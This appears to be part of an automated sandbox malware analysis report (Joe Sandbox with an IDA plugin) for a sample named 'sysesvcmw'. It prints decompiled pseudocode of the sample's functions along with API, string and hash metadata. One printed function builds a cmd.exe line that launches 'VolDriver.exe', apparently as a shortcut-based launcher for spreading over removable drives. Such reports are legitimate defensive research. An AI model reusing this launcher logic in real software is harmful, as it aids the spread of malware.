                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                                    					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                                    						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                                    						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t85 - 0x18)) = E0040C200( *(_t85 - 0x10), L"deviceType");
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                                                    									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                    									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                                    										L10:
                                                                                                                                                                                                                                                                                    										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                                    											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L12:
                                                                                                                                                                                                                                                                                    										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L19:
                                                                                                                                                                                                                                                                                    				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c927
                                                                                                                                                                                                                                                                                    0x0040c930
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c940
                                                                                                                                                                                                                                                                                    0x0040c944
                                                                                                                                                                                                                                                                                    0x0040c94d
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca33
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c96f
                                                                                                                                                                                                                                                                                    0x0040c978
                                                                                                                                                                                                                                                                                    0x0040c983
                                                                                                                                                                                                                                                                                    0x0040c993
                                                                                                                                                                                                                                                                                    0x0040c9a4
                                                                                                                                                                                                                                                                                    0x0040c9a6
                                                                                                                                                                                                                                                                                    0x0040c9b7
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9ca
                                                                                                                                                                                                                                                                                    0x0040c9d3
                                                                                                                                                                                                                                                                                    0x0040c9db
                                                                                                                                                                                                                                                                                    0x0040c9e3
                                                                                                                                                                                                                                                                                    0x0040c9f3
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9fb
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040ca05
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040ca13
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca1d
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x0040ca25
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca38
                                                                                                                                                                                                                                                                                    0x0040ca3e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C99C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C9FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CA17
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                                    • Opcode ID: d1e252de239358218e20ca43259cf9d3f4c29c9aecec0edfa49fab37b6abc5cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 13aee1176452d62b74ac46d26b233db62756319b53bb87b3b8849ed906738a0f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1e252de239358218e20ca43259cf9d3f4c29c9aecec0edfa49fab37b6abc5cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31C974E0020ADBCB14CF99D894BAFB7B5AF88304F108269E515B7390D7789A85CF94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00407980(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 | _a4;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 | _a8;
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                                                                                                                                                                                                                    				return _a4;
                                                                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                                                                    0x0040798d
                                                                                                                                                                                                                                                                                    0x0040799e
                                                                                                                                                                                                                                                                                    0x004079a7
                                                                                                                                                                                                                                                                                    0x004079aa
                                                                                                                                                                                                                                                                                    0x004079c0
                                                                                                                                                                                                                                                                                    0x004079dc
                                                                                                                                                                                                                                                                                    0x004079e5
                                                                                                                                                                                                                                                                                    0x004079e8
                                                                                                                                                                                                                                                                                    0x004079fe
                                                                                                                                                                                                                                                                                    0x00407a1a
                                                                                                                                                                                                                                                                                    0x00407a23
                                                                                                                                                                                                                                                                                    0x00407a26
                                                                                                                                                                                                                                                                                    0x00407a32

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 2093b42955e45bd62e61740d1c7aadb5a606cc23c90c49e7bcc84aa687a307ef
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C1121325005286B9B10EF5EC4826CABBD6EF84361B15C136FC2CDF359D634D9515BD4
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                    			E00404D70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				short _v540;
                                                                                                                                                                                                                                                                                    				char* _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                    				_t37 =  &_v12;
                                                                                                                                                                                                                                                                                    				__imp__CoCreateInstance(0x410338, 0, 1, 0x410328, _t37);
                                                                                                                                                                                                                                                                                    				_v8 = _t37;
                                                                                                                                                                                                                                                                                    				if(_v8 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x415124, 0x415124);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                                                                                                                                                                                                                    					_t42 =  *_v12;
                                                                                                                                                                                                                                                                                    					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410348,  &_v16);
                                                                                                                                                                                                                                                                                    					if(_v8 >= 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00404d7b
                                                                                                                                                                                                                                                                                    0x00404d81
                                                                                                                                                                                                                                                                                    0x00404d93
                                                                                                                                                                                                                                                                                    0x00404d99
                                                                                                                                                                                                                                                                                    0x00404da0
                                                                                                                                                                                                                                                                                    0x00404dc6
                                                                                                                                                                                                                                                                                    0x00404de0
                                                                                                                                                                                                                                                                                    0x00404ded
                                                                                                                                                                                                                                                                                    0x00404df3
                                                                                                                                                                                                                                                                                    0x00404df6
                                                                                                                                                                                                                                                                                    0x00404e06
                                                                                                                                                                                                                                                                                    0x00404e1b
                                                                                                                                                                                                                                                                                    0x00404e33
                                                                                                                                                                                                                                                                                    0x00404e3a
                                                                                                                                                                                                                                                                                    0x00404e54
                                                                                                                                                                                                                                                                                    0x00404e62
                                                                                                                                                                                                                                                                                    0x00404e62
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404e70
                                                                                                                                                                                                                                                                                    0x00404e75

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00404D7B
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00410338,00000000,00000001,00410328,?), ref: 00404D93
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404DC6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 00404DBA
                                                                                                                                                                                                                                                                                    • %windir%\System32\cmd.exe, xrefs: 00404DCF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                                                    • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                                                                                                                                                                                                                    • API String ID: 2038452267-2473591295
                                                                                                                                                                                                                                                                                    • Opcode ID: eadea155d48dcf4b5dc2eddb40bd72b199a5ff6e8701186b8fb8f04e5b27ea74
                                                                                                                                                                                                                                                                                    • Instruction ID: 2a49fd5d28e8ccd51fed007e1346deb4ba552c81a06522ba7ecdc7d03be8f695
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eadea155d48dcf4b5dc2eddb40bd72b199a5ff6e8701186b8fb8f04e5b27ea74
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B31B775A40208EFCB04DF98D885EDEB7B5FF88704F208199E615A72A0C674AE81CB54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                                                                    			E00407570(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                                                                                                                                                                                                                    				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040757b
                                                                                                                                                                                                                                                                                    0x0040757e
                                                                                                                                                                                                                                                                                    0x0040758a
                                                                                                                                                                                                                                                                                    0x0040758d
                                                                                                                                                                                                                                                                                    0x00407599
                                                                                                                                                                                                                                                                                    0x0040759c
                                                                                                                                                                                                                                                                                    0x004075a8
                                                                                                                                                                                                                                                                                    0x004075ab
                                                                                                                                                                                                                                                                                    0x004075b7
                                                                                                                                                                                                                                                                                    0x004075ba
                                                                                                                                                                                                                                                                                    0x004075c6
                                                                                                                                                                                                                                                                                    0x004075cb
                                                                                                                                                                                                                                                                                    0x004075ce
                                                                                                                                                                                                                                                                                    0x004075dc

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                                    • Instruction ID: a1b14869e86cb328d4ae7b27d3c95eded15a07d37ad0fd28e3103b9823fe5a09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F03172901429AB9710EEEF84824CAFBE69F88364B118576FC18E3270E9709D1146F2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040DD00(intOrPtr* __ebx, void* __edi) {
                                                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                                                                                                    				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                                                                                                                                                                                                                    					SetEvent( *(__ebx + 0x10));
                                                                                                                                                                                                                                                                                    					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                                                                                                                                                                                                                    					CloseHandle( *(__ebx + 0x14));
                                                                                                                                                                                                                                                                                    					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                                                                                                                                                                                                                    					if(_t26 == 0) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						E00409600( *((intOrPtr*)(_t18 + 8)));
                                                                                                                                                                                                                                                                                    						return E00408C70(_t18);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						E00408C70( *((intOrPtr*)(_t26 + 0x18)));
                                                                                                                                                                                                                                                                                    						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                                                                                                                                                                                                                    						E00408C70(_t26);
                                                                                                                                                                                                                                                                                    						_t28 = _t28 + 8;
                                                                                                                                                                                                                                                                                    						_t26 = _t23;
                                                                                                                                                                                                                                                                                    					} while (_t23 != 0);
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040dd00
                                                                                                                                                                                                                                                                                    0x0040dd02
                                                                                                                                                                                                                                                                                    0x0040dd11
                                                                                                                                                                                                                                                                                    0x0040dd1d
                                                                                                                                                                                                                                                                                    0x0040dd27
                                                                                                                                                                                                                                                                                    0x0040dd2d
                                                                                                                                                                                                                                                                                    0x0040dd32
                                                                                                                                                                                                                                                                                    0x0040dd51
                                                                                                                                                                                                                                                                                    0x0040dd55
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dd63
                                                                                                                                                                                                                                                                                    0x0040dd35
                                                                                                                                                                                                                                                                                    0x0040dd39
                                                                                                                                                                                                                                                                                    0x0040dd3e
                                                                                                                                                                                                                                                                                    0x0040dd42
                                                                                                                                                                                                                                                                                    0x0040dd47
                                                                                                                                                                                                                                                                                    0x0040dd4a
                                                                                                                                                                                                                                                                                    0x0040dd4c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dd50
                                                                                                                                                                                                                                                                                    0x0040dd64

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                      • Part of subcall function 00408C70: HeapFree.KERNEL32(01E90000,00000000,00401192), ref: 00408CCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                                                                                                                                                                    • Opcode ID: f5c6ee23cecd016198fd4af76c8758ed014f635e7033cc2238d2bb5f9f771a0d
                                                                                                                                                                                                                                                                                    • Instruction ID: 47894c430adc079fffee70a5773b5e3dad97f275ab1eff5073097a11c037a3ac
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5c6ee23cecd016198fd4af76c8758ed014f635e7033cc2238d2bb5f9f771a0d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F0C872804210ABCB20AFA5EC84D5777785F45320304466EFD4467396CA38DC45C7B8
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404BD0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				short _v1052;
                                                                                                                                                                                                                                                                                    				intOrPtr _v1056;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetDriveTypeW(_a4);
                                                                                                                                                                                                                                                                                    				_v1056 = _v8;
                                                                                                                                                                                                                                                                                    				if(_v1056 >= 2) {
                                                                                                                                                                                                                                                                                    					if(_v1056 <= 3 || _v1056 == 6) {
